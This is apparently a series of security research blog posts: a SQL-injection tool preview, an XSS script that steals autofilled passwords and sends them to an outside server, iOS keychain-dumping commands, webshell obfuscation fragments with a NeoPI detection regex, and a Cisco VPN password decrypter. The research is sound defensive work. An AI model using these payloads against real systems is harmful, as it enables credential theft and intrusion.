DEF CON 20 – Neohapsis New Tool BBQSQL to Make its Debut!

By Scott Behrens and Ben Toews

Ben and I have been grinding away on slides and code in preparation for our talk at DEF CON 20.  Without letting all of the cats out of the bag, I wanted to take a second to provide a little more context for our talk and research before we present our new tools at the conference.

BBQSQL is a SQL injection framework specifically designed to be hyper fast, database agnostic, easy to set up, and easy to modify.  The tool is extremely effective at exploiting a particular type of SQL injection flaw known as blind/semi-blind SQL injection.  When doing application security assessments, we often uncover SQL injection vulnerabilities that are difficult to exploit. While current tools have an enormous amount of capability, when you can’t seem to get them to work you are out of luck.  We frequently end up writing custom scripts to aid in the tricky data extraction, but a lot of time is invested in developing, testing, and debugging these scripts.

BBQSQL helps automate the process of exploiting tricky blind SQL injection.  We developed a very easy UI to help you set up all the requirements for your particular vulnerability, and it provides real-time configuration checking to make sure your data looks right.  On top of being easy to use, it was designed using the event-driven concurrency provided by Python’s gevent.  This allows BBQSQL to run much faster than existing single-threaded/multithreaded applications.
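
To give a rough feel for why this matters, here is a minimal, hypothetical sketch of gevent-style concurrency (illustrative only, not BBQSQL’s actual code; the target URL and payloads are made up): many HTTP probes can be in flight at once inside a single thread, with each greenlet yielding to the others while it waits on the network.

import gevent
from gevent import monkey
monkey.patch_all()  # make the socket layer cooperative

from urllib.parse import quote
from urllib.request import urlopen

def probe(payload):
    # While this greenlet waits on the network, gevent runs the others.
    url = "http://target.example/item?id=" + quote(payload)
    return len(urlopen(url).read())

payloads = ["1 AND 1=1", "1 AND 1=2"]
jobs = [gevent.spawn(probe, p) for p in payloads]
gevent.joinall(jobs)
print([job.value for job in jobs])  # differing response sizes reveal true/false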

We will be going into greater detail on the benefits of this kind of concurrency during the talk. We will also talk a bit about character frequency analysis and some of the ways BBQSQL uses it to extract data faster (there is a small sketch of the idea below the screenshots).  We will be doing a demo, too, to show you how to use the UI as well as how to import and export attack configs.  Here are a few screenshots to get you excited!

BBQSQL User Interface

BBQSQL Performing Blind SQL Injection
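
Here is the small sketch of the frequency-analysis idea promised above (hypothetical and self-contained, not the tool’s implementation; the oracle stands in for a boolean blind-SQLi request): when extracting a value one character at a time, guessing candidates in rough frequency order drives the average number of requests per character well below a naive alphabet scan.

import string

# Try likelier characters first (rough English/identifier frequency order).
FREQ_ORDER = "etaoinshrdlucmfwypvbgkjqxz0123456789_" + string.ascii_uppercase

SECRET = "admin_hash"  # pretend this lives in the target database

def oracle(prefix, ch):
    # In a real attack this would be one HTTP request whose true/false
    # outcome is inferred from the response.
    return SECRET.startswith(prefix + ch)

def extract(length):
    out, requests = "", 0
    for _ in range(length):
        for ch in FREQ_ORDER:
            requests += 1
            if oracle(out, ch):
                out += ch
                break
    return out, requests

print(extract(len(SECRET)))  # far fewer probes than scanning a-z0-9 in order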

If you come see the talk, we would love to hear your thoughts!

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst-case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By resetting the password, the attacker gives away his presence, and the extent to which he is able to masquerade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means exist that do not involve changing user passwords.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third-party password managers such as LastPass are also capable of generating strong, application-specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong, application-specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long-time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser and third-party password managers that gets hardly any attention is how they can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page as well as a second page that is vulnerable to XSS (find them here). I then proceeded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    var ex_username = '';
    var ex_password = '';
    var inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        // Fire once the password manager has auto-filled either field.
        if(ex_username != '' || ex_password != ''){
            // Hide the injected form so the victim never sees it.
            document.getElementById('xss').style.display = 'none';
            var request = new XMLHttpRequest();
            var url = "http://btoe.ws/pwxss?username="+encodeURIComponent(ex_username)+
                      "&password="+encodeURIComponent(ex_password);
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility = 'hidden';
            window.clearInterval(inter);
        }
    }
    // Write a fake login form for the browser/password manager to fill.
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    // Poll every 100ms until the form has been filled.
    inter = window.setInterval(attack, 100);
</script>

All this code does is create a fake login form on the XSS-vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and log in (username: user1, password: secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand, could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While both of these may be inconveniences from a usability perspective, they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use pushState to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

NeoPI in the Wild

By Scott Behrens

NeoPI is a project that Ben Hagen and I developed to aid in the detection of obfuscated and encrypted webshells.  I recently came across an article about the Webacoo shell and a rewrite of this PHP backdoor to avoid detection by NeoPI.

Webacoo’s developer used a few interesting techniques to avoid detection.  The first avoids signature-based detection by building the sensitive function name with ‘strrev’:

$b = strrev("edoced_4"."6esab");

This bypasses our traditional signature-based detection and lends itself to a few other evasion techniques.  Another webshell that surfaced after NeoPI’s release uses similar tricks to avoid signature-based detection; one example is the following (as seen at https://elrincondeseth.Wordpress.com/2011/08/17/bypasseando-neopi/):

$b = 'bas'.'e64'.'_de'.'code';

We can see that just by breaking up the word, the risk of detection is largely mitigated.  As I suggested at B-Sides, signature-based detection is complementary to the other tests in NeoPI but, by itself, ineffective.  The methods described above completely thwart this test’s effectiveness.
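
To make that concrete, here is a toy illustration (hypothetical, not NeoPI’s code) of why a literal signature never fires against either obfuscated form:

import re

samples = [
    '$b = strrev("edoced_4"."6esab");',   # reversed, split string
    "$b = 'bas'.'e64'.'_de'.'code';",     # concatenated fragments
]

# A naive signature scan for the literal function name misses both.
signature = re.compile(r"base64_decode")
for s in samples:
    print(bool(signature.search(s)))      # prints False twice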

But one thing these techniques must do at some point is actually eval the code.  Webacoo, for example, uses the following:

eval($b(str_replace(" ","","a W Y o a X …SNIP

By developing a regex that looks for eval being called on a variable that holds a function name, we can flag the file as malicious.  After running this test against a WordPress server with Webacoo’s shell, I observed the following:

Figure 1 – Webacoo identified as suspicious in eval test

NeoPI was able to detect the function and flagged it as malicious.  This particular use of eval isn’t very common, and I have really only seen it used in malware.  That being said, functions.php was also flagged, so I imagine this test can still have many false positives and should be used to aid manual investigation of the files identified.
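
A pattern along these lines catches the construct (a hypothetical sketch; NeoPI’s actual regex may differ):

import re

# Flag eval() applied to a variable that holds a function name, e.g. eval($b(...)).
EVAL_DYNAMIC = re.compile(r"eval\s*\(\s*\$\w+\s*\(", re.IGNORECASE)

sample = 'eval($b(str_replace(" ","","a W Y o a X ...")));'
if EVAL_DYNAMIC.search(sample):
    print("suspicious: eval of a variable-held function")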

Another tweak Webacoo’s developer made was to insert spaces between each character of a base64-encoded string.  The function str_replace() is called to remove each space before the code is base64-decoded and eval’d.

In order to thwart this particular obfuscation technique, I went ahead and modified the entropy function to strip spaces from the data the function is analyzing. The screenshot below shows a scan against 1,752 PHP files in WordPress, with the entropy test now flagging webacoo.php as potentially malicious. This increased NeoPI’s effectiveness at detecting webacoo.php but is more of a stopgap solution, as the attacker can craft other junk characters to lower the shell’s entropy and index of coincidence. Some additional thought and research is needed on potentially looking for these complicated search-and-replace functions to determine if the data being obfuscated is malicious.

Figure 2 – Test results after modifying entropy code results in higher entropy of webacoo.php
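
The gist of the change is simple (a sketch of the idea, not the exact NeoPI diff): strip the whitespace before measuring Shannon entropy, so the injected spaces can’t drag the score down.

import math

def shannon_entropy(data):
    stripped = data.replace(" ", "")  # defeat space-padding of encoded blobs
    if not stripped:
        return 0.0
    entropy = 0.0
    for ch in set(stripped):
        p = stripped.count(ch) / len(stripped)
        entropy -= p * math.log(p, 2)
    return entropy

blob = "aWYoaXNzZXQoJF9QT1NUWyJjbWQiXSkp"
padded = " ".join(blob)                                   # Webacoo-style space padding
print(shannon_entropy(padded) == shannon_entropy(blob))   # True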

The latest version of the code, which includes these enhancements, can be checked out at http://github.com/Neohapsis/NeoPI.

As for improving the other tests’ effectiveness, I am looking into the possibility of identifying base64 encodings without looking for the function name.  One approach may be to build a ratio of upper-case to lower-case characters and see whether files that use obfuscation trend differently.
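
A first cut at that heuristic might look something like this (hypothetical, not yet in the tool): base64 output tends to mix upper- and lower-case characters far more evenly than ordinary source code, which is mostly lower-case.

def case_mix_ratio(text):
    # Ratio of upper-case to lower-case letters; near 0 for typical code,
    # noticeably higher for base64-style blobs.
    upper = sum(1 for c in text if c.isupper())
    lower = sum(1 for c in text if c.islower())
    return upper / lower if lower else 0.0

print(case_mix_ratio("function get_header() { return $header; }"))    # 0.0
print(case_mix_ratio("aWYoaXNzZXQoJF9QT1NUWyJjbWQiXSkpIHsgZXZhbCg="))  # much higher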

If anyone has interesting techniques for defeating NeoPI, please respond to this post and I’ll look at adding more detection mechanisms to this tool!

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regarding some issues found in Apple’s Keychain service.  The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found.  What the researchers actually found was more nuanced than what was reported.  But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App Store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading keychain data, a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper, Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application.  These cryptographic signatures are known as “entitlements” in iOS parlance.  Essentially, an application must have the correct entitlement to access a given item in the keychain.  So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day).  As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group.  Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you jailbreak your iOS device.  When a user jailbreaks their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a jailbroken device will honor the signature as if it were from Apple itself.

Based on the above description, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to enumerate them, sign our own application as a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain.  So, how do we go about getting a list of all the access group entitlements we will need?  Well, the keychain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp
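
If you want to poke at that step by hand, a few lines against a copy of the database pulled from a jailbroken device will do it (a hypothetical sketch; keychain_dumper automates all of this):

import sqlite3

# Enumerate the distinct access groups stored in the keychain database.
conn = sqlite3.connect("keychain-2.db")  # copied off the device
for (group,) in conn.execute("SELECT DISTINCT agrp FROM genp"):
    print(group)  # each becomes a keychain-access-groups entitlement entry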

Once we have a list of all the access groups, we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool called keychain_dumper that does exactly that.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlements into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happened to come across (I’m sure at least one person will find the article that does mention this point :-)).  This is an important point, as it completely reframes the discussion.  The way it was reported, it looks like the point is to show how insecure iOS is.  In reality, the point should have been to show how security is all about trading off various factors (security, convenience, etc.).  This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application.  Stealing a small section from Apple’s keychain documentation, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self-descriptive, but the main thing to focus on is the “WhenUnlocked” accessibility constants.  If a developer chooses a “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking?  Why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to log in to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of users’ data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.

Java Cisco Group Password Decrypter

By Patrick Toomey

For whatever reason I have found myself needing to “decrypt” Cisco VPN client group passwords throughout the years.  I say “decrypt,” as the value is technically encrypted using 3DES, but the mechanism used to decrypt the value is largely obfuscative (the cryptographic key is included in the ciphertext).  As such, the encryption used is largely incidental, and any simplistic substitution cipher would have protected the group password equally well (think newspaper cryptogram).
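
For the curious, the deobfuscation scheme fits in a few lines.  This is a sketch in Python (mirroring the widely circulated C implementation and using PyCryptodome; it is not the Java tool described below): the first 20 bytes of the hex blob seed a SHA-1-based key derivation, bytes 20–39 are an integrity hash, and the remainder is the 3DES-CBC ciphertext.

import hashlib
from Crypto.Cipher import DES3  # pip install pycryptodome

def decrypt_group_password(hex_blob):
    data = bytes.fromhex(hex_blob)
    ht = bytearray(data[:20])           # key material; first 8 bytes double as the IV
    ciphertext = data[40:]              # bytes 20..39 (an integrity hash) are skipped
    ht[19] = (ht[19] + 1) & 0xFF
    h2 = hashlib.sha1(ht).digest()
    ht[19] = (ht[19] + 2) & 0xFF
    h3 = hashlib.sha1(ht).digest()
    key = h2 + h3[:4]                   # 24-byte 3DES key, derived from the blob itself
    plain = DES3.new(key, DES3.MODE_CBC, iv=data[:8]).decrypt(ciphertext)
    return plain[:-plain[-1]]           # strip trailing padding

# usage: print(decrypt_group_password("9196FE00...").decode())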

I can’t pinpoint all the root reasons, but it seems as though every couple of months I need a group password decrypted.  Sometimes I am simply moving a Cisco VPN profile from Windows to Linux.  Other times I’ve been on a client application assessment/penetration test where I’ve needed to gain access to the plaintext group password.  Regardless, I inevitably find myself googling for “cisco group password decrypter”.  A few different results are returned.  The top result is always a link here.  This site has a simple web app that will decrypt the group password for you, though it occurs server-side.  Being paranoid by trade, I am always apprehensive about sending information to a third party if that information is considered sensitive (whether by me, our IT department, or a client).  I have no reason to think the referenced site is malicious, but it would not be in my best interest professionally not to be security conscious, particularly with client information.  The referenced site has a link to the original source code, and one can feel free to download, audit, compile, and use the provided tool to perform all of the decryption client-side.  That said, the linked file depends on libgcrypt.  That is fine if I am sitting in Linux, but not as great if I am on some new Windows box (ok, maybe I’m one of the few who doesn’t keep libgcrypt at the ready on my fresh Windows installs).  I’ve googled around to see if anything exists that is more portable.  I found a few things, including a link to a Java applet, but the developer seems to have lost the source code…  So, laziness won, and I decided it would be easier to spend 30 minutes writing my own cross-platform Java version than spend any more time on Google.

The code for the decrypter can be found on our github, here.  I am not a huge fan of Java GUI development, and thus leveraged the incredible GUI toolkit built into NetBeans.  The referenced source code should compile cleanly in NetBeans if you want the GUI.  If you simply want to decrypt group passwords with no dependencies you can run a command line version by compiling the “GroupPasswordDecrypter” class file.  This file has zero dependencies on third-party libraries and should be sufficient for anyone who doesn’t feel compelled to use a GUI (me included).

As a quick example, I borrowed a sample encrypted group password from another server-side implementation.  The encrypted group password we would like to decrypt is:

9196FE0075E359E6A2486905A1EFAE9A11D652B2C588EF3FBA15574237302B74C194EC7D0DD16645CB534D94CE85FEC4

Or, if you prefer, the command line version produces the same result.

Hope it comes in handy!

Virtualization: When and where?

We often field questions from our clients regarding the risks associated with hypervisor/virtualization technology.  Ultimately the technology is still software, and still faces many of the same challenges any commercial software package faces, but there are definitely some areas worth noting.

The following thoughts are by no means a comprehensive overview of all issues, but they should provide the reader with a general foundation for thinking about virtualization-specific risks.

Generally speaking, virtual environments are not that different than physical environments.  They require much of the same care and feeding, but that’s the rub; most companies don’t do a good job of managing their physical environments, either.  Virtualization can simply make existing issues worse.

For example, if an organization doesn’t have a vulnerability management program that is effective at activities like asset identification, timely patching, maintaining the installed security technologies, change control, and system hardening, then the adoption of virtualization technology usually compounds the problem via increased “server sprawl.”  Systems become even easier to deploy, which leads to more systems not being properly managed.

We often see these challenges creep up in a few scenarios:

Testing environments – Teams can get systems up and running very quickly using existing hardware.  Easy and fast…but also dirty. They often don’t take the time to harden the systems, bring them up to current patch levels, or install required security software.

Even in scenarios where templates are used, with major OS vendors like Microsoft and RedHat coming out with security fixes on a monthly basis, a template even two months old is out of date.

Rapid deployment of “utility” servers – Systems that run back-office services like mail servers, print servers, file servers, DNS servers, etc.  Often nobody does much custom work on them, and because they can no longer be physically seen or “tripped over” in the data center, they sometimes fly under the radar.

Development environments – We often see virtualization technology making inroads into companies with developers that need to spin up and spin down environments quickly to save time and money.  The same challenges apply; if the systems aren’t maintained (and they often aren’t – developers aren’t usually known for their attention to system administration tasks) they present great targets for the would-be attacker.  Even worse if the developers use sensitive data for testing purposes.  If properly isolated, there is less risk from what we’ve described above, but that isolation has to be pretty well enforced and monitored to really mitigate these risks.

There are also risks associated with vulnerabilities in the technology itself.  The often-feared “guest breakout” scenario, where a virtual machine or “guest” is able to “break out” of its jail and take over the host (and therefore access data in any of the other guests), is a common one, although we haven’t heard of any real-world exploitations of these defects…yet.  (The vulnerabilities are, however, starting to become better understood.)

There are also concerns about hopping between security “zones” when it comes to compliance or data segregation requirements.  For example, a physical environment typically has a firewall and other security controls between a web server and a database server.  In a virtual environment, if they are sharing the same host hardware, you typically cannot put a firewall, intrusion detection device, or data leakage control between them.  This could violate control mandates found in standards such as PCI in a credit card environment.

Even assuming there are no vulnerabilities in the hypervisor technology that allow for evil network games between hosts, when you house two virtual machines/guests on the same hypervisor/host you often lose visibility into the network traffic between them.  So if your security relies on restricting or monitoring at the network level, you no longer have that ability.  Some vendors are working on solutions to secure intra-host communication, but none of them are mature by any means.

Finally, the “many eggs in one basket” concern is still a factor; when you have 10, 20, 40, or more guest machines on a single piece of hardware, that’s a lot of potential systems going down should there be a problem.  While the virtualization software vendors certainly offer high-availability options with technology such as VMware’s VMotion, redundant hardware, the use of SANs, etc., the cost and complexity add up fairly fast.  (And as we have seen from some rather nasty SAN failures the past two months, SANs aren’t always as failsafe as we have been led to believe. You still have backups, right?)

While in some situations the benefits of virtualization technology far outweigh the risks, there are certainly situations where existing non-virtualized architectures are better. The trick is finding that line in the midst of the headlong rush toward virtualization.

–Tyler

Hacker Halted 2009

As many of you know, Greg Ose and I recently spoke at Hacker Halted 2009 in Miami. We discussed a distributed password cracker we designed and implemented that uses redirected browsers to build a swarm of worker nodes. The method we demonstrated can be implemented using large numbers of otherwise useless stored cross-site scripting vulnerabilities. The client-side worker was implemented as a Java applet in an injected iframe.

Greg and I also showed several methods that can be used on different platforms to trick the Java virtual machine into continuing execution after a client has closed the page where it is embedded. This can be used to maintain large numbers of workers even when the vulnerable sites are not visited for long periods of time.

The following video shows the administrative interface to DistCrypt where we can add and manage password hashes.

You can view the high quality version here.

You can also view the slides from our presentation on the Hacker Halted website here.